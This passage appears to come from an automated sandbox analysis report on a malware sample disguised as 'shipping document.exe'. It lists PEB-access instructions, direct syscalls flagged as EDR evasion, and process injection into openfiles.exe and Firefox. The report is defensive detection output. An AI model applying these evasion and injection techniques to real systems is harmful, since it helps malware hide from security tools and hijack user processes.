              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01786962 mov eax, dword ptr fs:[00000030h]2_2_01786962
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01786962 mov eax, dword ptr fs:[00000030h]2_2_01786962
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E0946 mov eax, dword ptr fs:[00000030h]2_2_017E0946
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182A9D3 mov eax, dword ptr fs:[00000030h]2_2_0182A9D3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E892A mov eax, dword ptr fs:[00000030h]2_2_017E892A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F892B mov eax, dword ptr fs:[00000030h]2_2_017F892B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC912 mov eax, dword ptr fs:[00000030h]2_2_017EC912
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758918 mov eax, dword ptr fs:[00000030h]2_2_01758918
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758918 mov eax, dword ptr fs:[00000030h]2_2_01758918
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE908 mov eax, dword ptr fs:[00000030h]2_2_017DE908
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE908 mov eax, dword ptr fs:[00000030h]2_2_017DE908
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017929F9 mov eax, dword ptr fs:[00000030h]2_2_017929F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017929F9 mov eax, dword ptr fs:[00000030h]2_2_017929F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE9E0 mov eax, dword ptr fs:[00000030h]2_2_017EE9E0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017949D0 mov eax, dword ptr fs:[00000030h]2_2_017949D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F69C0 mov eax, dword ptr fs:[00000030h]2_2_017F69C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834940 mov eax, dword ptr fs:[00000030h]2_2_01834940
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E89B3 mov esi, dword ptr fs:[00000030h]2_2_017E89B3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E89B3 mov eax, dword ptr fs:[00000030h]2_2_017E89B3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E89B3 mov eax, dword ptr fs:[00000030h]2_2_017E89B3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017609AD mov eax, dword ptr fs:[00000030h]2_2_017609AD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017609AD mov eax, dword ptr fs:[00000030h]2_2_017609AD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01804978 mov eax, dword ptr fs:[00000030h]2_2_01804978
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01804978 mov eax, dword ptr fs:[00000030h]2_2_01804978
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE872 mov eax, dword ptr fs:[00000030h]2_2_017EE872
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE872 mov eax, dword ptr fs:[00000030h]2_2_017EE872
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6870 mov eax, dword ptr fs:[00000030h]2_2_017F6870
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6870 mov eax, dword ptr fs:[00000030h]2_2_017F6870
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01790854 mov eax, dword ptr fs:[00000030h]2_2_01790854
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764859 mov eax, dword ptr fs:[00000030h]2_2_01764859
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764859 mov eax, dword ptr fs:[00000030h]2_2_01764859
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01772840 mov ecx, dword ptr fs:[00000030h]2_2_01772840
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018308C0 mov eax, dword ptr fs:[00000030h]2_2_018308C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A830 mov eax, dword ptr fs:[00000030h]2_2_0179A830
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov ecx, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182A8E4 mov eax, dword ptr fs:[00000030h]2_2_0182A8E4
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC810 mov eax, dword ptr fs:[00000030h]2_2_017EC810
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C8F9 mov eax, dword ptr fs:[00000030h]2_2_0179C8F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C8F9 mov eax, dword ptr fs:[00000030h]2_2_0179C8F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E8C0 mov eax, dword ptr fs:[00000030h]2_2_0178E8C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180483A mov eax, dword ptr fs:[00000030h]2_2_0180483A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180483A mov eax, dword ptr fs:[00000030h]2_2_0180483A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC89D mov eax, dword ptr fs:[00000030h]2_2_017EC89D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760887 mov eax, dword ptr fs:[00000030h]2_2_01760887
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175CB7E mov eax, dword ptr fs:[00000030h]2_2_0175CB7E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758B50 mov eax, dword ptr fs:[00000030h]2_2_01758B50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814BB0 mov eax, dword ptr fs:[00000030h]2_2_01814BB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814BB0 mov eax, dword ptr fs:[00000030h]2_2_01814BB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6B40 mov eax, dword ptr fs:[00000030h]2_2_017F6B40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6B40 mov eax, dword ptr fs:[00000030h]2_2_017F6B40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180EBD0 mov eax, dword ptr fs:[00000030h]2_2_0180EBD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EB20 mov eax, dword ptr fs:[00000030h]2_2_0178EB20
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EB20 mov eax, dword ptr fs:[00000030h]2_2_0178EB20
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834B00 mov eax, dword ptr fs:[00000030h]2_2_01834B00
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EBFC mov eax, dword ptr fs:[00000030h]2_2_0178EBFC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768BF0 mov eax, dword ptr fs:[00000030h]2_2_01768BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768BF0 mov eax, dword ptr fs:[00000030h]2_2_01768BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768BF0 mov eax, dword ptr fs:[00000030h]2_2_01768BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017ECBF0 mov eax, dword ptr fs:[00000030h]2_2_017ECBF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01828B28 mov eax, dword ptr fs:[00000030h]2_2_01828B28
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01828B28 mov eax, dword ptr fs:[00000030h]2_2_01828B28
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01780BCB mov eax, dword ptr fs:[00000030h]2_2_01780BCB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01780BCB mov eax, dword ptr fs:[00000030h]2_2_01780BCB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01780BCB mov eax, dword ptr fs:[00000030h]2_2_01780BCB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760BCD mov eax, dword ptr fs:[00000030h]2_2_01760BCD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760BCD mov eax, dword ptr fs:[00000030h]2_2_01760BCD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760BCD mov eax, dword ptr fs:[00000030h]2_2_01760BCD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182AB40 mov eax, dword ptr fs:[00000030h]2_2_0182AB40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01808B42 mov eax, dword ptr fs:[00000030h]2_2_01808B42
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770BBE mov eax, dword ptr fs:[00000030h]2_2_01770BBE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770BBE mov eax, dword ptr fs:[00000030h]2_2_01770BBE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814B4B mov eax, dword ptr fs:[00000030h]2_2_01814B4B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814B4B mov eax, dword ptr fs:[00000030h]2_2_01814B4B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180EB50 mov eax, dword ptr fs:[00000030h]2_2_0180EB50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01832B57 mov eax, dword ptr fs:[00000030h]2_2_01832B57
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01832B57 mov eax, dword ptr fs:[00000030h]2_2_01832B57
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01832B57 mov eax, dword ptr fs:[00000030h]2_2_01832B57
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01832B57 mov eax, dword ptr fs:[00000030h]2_2_01832B57
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834A80 mov eax, dword ptr fs:[00000030h]2_2_01834A80
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DCA72 mov eax, dword ptr fs:[00000030h]2_2_017DCA72
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DCA72 mov eax, dword ptr fs:[00000030h]2_2_017DCA72
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179CA6F mov eax, dword ptr fs:[00000030h]2_2_0179CA6F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179CA6F mov eax, dword ptr fs:[00000030h]2_2_0179CA6F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179CA6F mov eax, dword ptr fs:[00000030h]2_2_0179CA6F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770A5B mov eax, dword ptr fs:[00000030h]2_2_01770A5B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770A5B mov eax, dword ptr fs:[00000030h]2_2_01770A5B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01784A35 mov eax, dword ptr fs:[00000030h]2_2_01784A35
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01784A35 mov eax, dword ptr fs:[00000030h]2_2_01784A35
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EA2E mov eax, dword ptr fs:[00000030h]2_2_0178EA2E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179CA24 mov eax, dword ptr fs:[00000030h]2_2_0179CA24
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017ECA11 mov eax, dword ptr fs:[00000030h]2_2_017ECA11
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179AAEE mov eax, dword ptr fs:[00000030h]2_2_0179AAEE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179AAEE mov eax, dword ptr fs:[00000030h]2_2_0179AAEE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760AD0 mov eax, dword ptr fs:[00000030h]2_2_01760AD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01794AD0 mov eax, dword ptr fs:[00000030h]2_2_01794AD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01794AD0 mov eax, dword ptr fs:[00000030h]2_2_01794AD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B6ACC mov eax, dword ptr fs:[00000030h]2_2_017B6ACC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B6ACC mov eax, dword ptr fs:[00000030h]2_2_017B6ACC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B6ACC mov eax, dword ptr fs:[00000030h]2_2_017B6ACC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768AA0 mov eax, dword ptr fs:[00000030h]2_2_01768AA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768AA0 mov eax, dword ptr fs:[00000030h]2_2_01768AA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B6AA4 mov eax, dword ptr fs:[00000030h]2_2_017B6AA4
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180EA60 mov eax, dword ptr fs:[00000030h]2_2_0180EA60
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798A90 mov edx, dword ptr fs:[00000030h]2_2_01798A90
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\openfiles.exeThread register set: target process: 6044Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\openfiles.exeThread APC queued: target process: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeProcess created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
